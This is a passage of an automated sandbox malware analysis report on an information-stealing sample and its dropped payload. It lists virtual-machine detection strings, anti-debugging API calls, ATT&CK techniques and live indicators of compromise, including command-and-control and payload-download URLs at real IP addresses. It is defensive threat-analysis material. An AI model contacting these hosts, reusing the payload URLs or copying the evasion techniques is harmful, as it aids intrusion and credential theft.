                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: SEejSLAS9f.exe, 00000000.00000002.4093501231.000000000091A000.00000004.00000020.00020000.00000000.sdmp, SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000970000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.7.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 1D71.tmp.exe, 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
                    Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00404980 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,1_2_00404980
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_00404980 VirtualProtect 00000000,00000004,00000100,?1_2_00404980
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_008DDEA3 push dword ptr fs:[00000030h]0_2_008DDEA3
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024A00C6 mov eax, dword ptr fs:[00000030h]0_2_024A00C6
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]0_2_0247092B
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]0_2_02470D90
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_004263C0 mov eax, dword ptr fs:[00000030h]1_2_004263C0
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_009EDEA3 push dword ptr fs:[00000030h]1_2_009EDEA3
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02496627 mov eax, dword ptr fs:[00000030h]1_2_02496627
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0247092B mov eax, dword ptr fs:[00000030h]1_2_0247092B
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02470D90 mov eax, dword ptr fs:[00000030h]1_2_02470D90
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0249A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0249A63A
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0248073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0248073A
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0247FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0247FB78
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_024808CD SetUnhandledExceptionFilter,0_2_024808CD
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02499A10 SetUnhandledExceptionFilter,1_2_02499A10
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02497E31 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02497E31
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_0249784F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0249784F
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_004246C0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_004246C0
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02494897 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,1_2_02494897
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02494927 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,1_2_02494927
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe "C:\Users\user\AppData\Local\Temp\1D71.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_004351C0
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_0043B282
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_0043B368
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_0043B645
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_0043B875
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024AB271
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_024A5034
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_024A5427
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_024AB4E9
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_024AB534
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: EnumSystemLocalesW,0_2_024AB5CF
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_024ABADC
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024ABBA9
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,0_2_024AB8AC
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024AB9D5
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_02492F67
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_004229E0 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_004229E0
                    Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exeCode function: 1_2_02492E17 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,1_2_02492E17
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                    Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 1.3.1D71.tmp.exe.24b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.1D71.tmp.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.2470e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 1.3.1D71.tmp.exe.24b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.3.1D71.tmp.exe.24b0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.2470e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.1D71.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 1D71.tmp.exe PID: 7860, type: MEMORYSTR
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02491B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_02491B33
                    Source: C:\Users\user\Desktop\SEejSLAS9f.exeCode function: 0_2_02490E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_02490E5D
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    OS Credential Dumping2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Create Account
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol3
                    Clipboard Data
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive3
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                    Software Packing
                    NTDS44
                    System Information Discovery
                    Distributed Component Object ModelInput Capture114
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Query Registry
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials131
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection
                    Proc Filesystem12
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    SEejSLAS9f.exe42%ReversingLabs
                    SEejSLAS9f.exe39%VirustotalBrowse
                    SEejSLAS9f.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\1D71.tmp.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe47%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1D71.tmp.exe47%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE0%Avira URL Cloudsafe
                    http://92.255.57.89/s100%Avira URL Cloudmalware
                    http://92.255.57.89lq0%Avira URL Cloudsafe
                    http://92.255.57.89/45c616e921a794b8.phpo100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exeo0%Avira URL Cloudsafe
                    http://176.113.115.19/ScreenUpdateSync.exev0%Avira URL Cloudsafe
                    http://92.255.57.89/45c616e921a794b8.php;100%Avira URL Cloudmalware
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exeX0%Avira URL Cloudsafe
                    http://92.255.57.8900%Avira URL Cloudsafe
                    http://92.255.57.89l(0%Avira URL Cloudsafe
                    http://92.255.57.89/697b92cb4e247842/sqlite3.dll~100%Avira URL Cloudmalware
                    http://92.255.57.89/45c616e921a794b8.php2dPf100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exe100%Avira URL Cloudmalware
                    https://post-to-me.com/track_prt.php?sub=0&cc=DEI100%Avira URL Cloudmalware
                    http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE1%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    post-to-me.com
                    172.67.179.207
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://92.255.57.89/45c616e921a794b8.phpfalse
                        high
                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                          high
                          http://92.255.57.89/false
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://post-to-me.com/track_prt.php?sub=&cc=DESEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                              high
                              http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARESEejSLAS9f.exe, 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                              • 1%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://92.255.57.891D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://92.255.57.89/45c616e921a794b8.phpo1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://post-to-me.com/track_prt.php?sub=SEejSLAS9f.exefalse
                                  high
                                  http://176.113.115.19/ScreenUpdateSync.exeoSEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://92.255.57.89lq1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://92.255.57.89/s1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://176.113.115.19/ScreenUpdateSync.exevSEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://92.255.57.89/45c616e921a794b8.php;1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://176.113.115.19/ScreenUpdateSync.exeXSEejSLAS9f.exe, 00000000.00000003.1720854605.0000000000983000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://post-to-me.com/SEejSLAS9f.exe, 00000000.00000002.4093501231.0000000000959000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://92.255.57.8901D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://92.255.57.89l(1D71.tmp.exe, 00000001.00000002.2242096439.00000000009DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://upx.sf.netAmcache.hve.7.drfalse
                                      high
                                      http://92.255.57.89/697b92cb4e247842/sqlite3.dll1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, 1D71.tmp.exe, 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpfalse
                                        high
                                        http://92.255.57.89/697b92cb4e247842/sqlite3.dll~1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        http://92.255.57.89/45c616e921a794b8.php2dPf1D71.tmp.exe, 00000001.00000002.2242147064.0000000000A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
